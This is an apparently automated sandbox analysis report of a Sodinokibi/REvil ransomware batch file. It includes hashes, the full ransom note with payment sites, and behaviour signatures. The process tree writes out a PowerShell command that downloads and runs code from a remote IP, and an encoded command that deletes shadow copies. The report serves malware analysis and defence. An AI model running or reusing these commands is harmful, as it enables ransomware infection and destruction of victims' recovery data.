Analysis

  • max time kernel
    107s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    06-03-2020 05:10

General

  • Target

    yv3bZq0C.bat

  • Size

    192B

  • MD5

    986293d617a3f38c055066d8971343fc

  • SHA1

    04a3044011926264954034bfeb463e7d9334018b

  • SHA256

    083231c01b3b9c859b9683303c6bc946c15210cda94df73f79350c94366fd859

  • SHA512

    befebd114ce90e8db3d026c2775cf8be09a714b6c2548d3728e7e89a3d01f3a385a3516740e103e380e3c8fb95552fc20103d3745520464e6976c23d777dfc34

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/yv3bZq0C

Extracted

Path

C:\w96xs84y4-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension w96xs84y4. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4417BDFD428A681 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E4417BDFD428A681 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: u0A4fGFpZTRc0csJl9kUXXJ4nx9U9zUS9mOl6UprnEgmNR/CjB3p0+mJgPDfr5Fj luImMRcgYg5QTNGzypIKg1LnZb530KuMEImTqJ05eMOvsJNdDb5mw50/8mg2FwzG owDgvTw7b3JNBfzxgQjSXckKb09aIs0ws+Fd8w1LCbakt9KQuQ1olCUtf1jgFNof jtDDUDPiQiyTyE36WnRFuUUIjz496cf/lHetUuS4DPZWjUOJPgPp0jnHFBM64Mxk QV5Qq2I2dgEncS72Se4WI0srIBQCfBU9+8lJ9kAsNHpFG6XKO9jFTJdKiHm/8uWe 5nkCmQ0GYDRPGHmHr44xd7TWYrW7sMREujM6e592biZsETqztIxBr8tzHy7/YjjA nkjSsDJR/vCmmmA8wUN9d/A00u7Xx2p0IqxknP4AzwfukDJLwQutkUWuQX3hJhAk qjwMq7sSbRw/DJ7pG1pe1VJuHjqbKt9nqQFdR8q8fc/bKHqzf3eV+CgJi9LpYcRx c+D46DSX+zRjubR0BGkTmLxmgR1ZHAXVZuEE4wzzfGXMhqxOOb7gQrZTgcQkjYB8 Drtsb96Fb1du28JWQNoV7NATOG6ty67HDXsnWtgcbHWBCCe1esttjf/IeeGsecEo DDXXGweTjeXQXpqvhUF1WKgofCTcIgxG/+8XxrvDhJSh+1FlZGSMHVg5UznWFKgy Y4FaVnMhcgJ/+TZINBJ9UUQftC1ksclrFpXtPrpLcPR/3BZWFa74WLn1WpSZRJ2v XcGLnko8CBcJyOsUu3q5wA1UealHfvVUyuTU5O9kJcQFGGSj2X6AQ3u2UvS8XLNc EtIOl9ivre8L/rwG8tmK8IcR0+jsnPzYpOGE3m8lglH+YOkx5AUvixJ5xF5L/JI9 R9dhc/3T0LfRzQQQnTg4uXYEam1NyegHcDuvLDPnXSuUwIpQBmIKq7pFtMebmU6K S+PpO2R/pHO8kFT2vzLWrOB8dt3yZkzCPhXYZBnkpOxm9QaviwsDOxjULhAmQ4Ly orLbbMZXnK09OyTB1DsgFtzBU1m9OH9dhuaZeAuVdygFyGnrl+76/2qZJy/LpUdh niaO9ATuS6brcKKijXrGftdrHAkpQvwXvOpQBcvT21RYswyeoMMNXBnU0bB51DQY qpmpxF75H7UaisqQbb8CBJv6dS6uwicz0ryRUdF7GIhBRxEdnntLWkcn8X0lQVNT 8qPjsraARQ6hwMRc1rVusiIcK0S+OJOMgXYqas7Hzq+eiERTOwElOd+jS+iUqDTU dnP9rNpOEEkbVAhaj3gign1qF2oVJ3O9JBJqSl8bs/xjPT8bC/s= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4417BDFD428A681

http://decryptor.cc/E4417BDFD428A681

Signatures

  • Discovering connected drives 3 TTPs 7 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Drops file in Program Files directory 33 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\yv3bZq0C.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/yv3bZq0C');Invoke-IAADNEEFN;Start-Sleep -s 10000"
      2⤵
      • Discovering connected drives
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:1884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1976
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1392

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms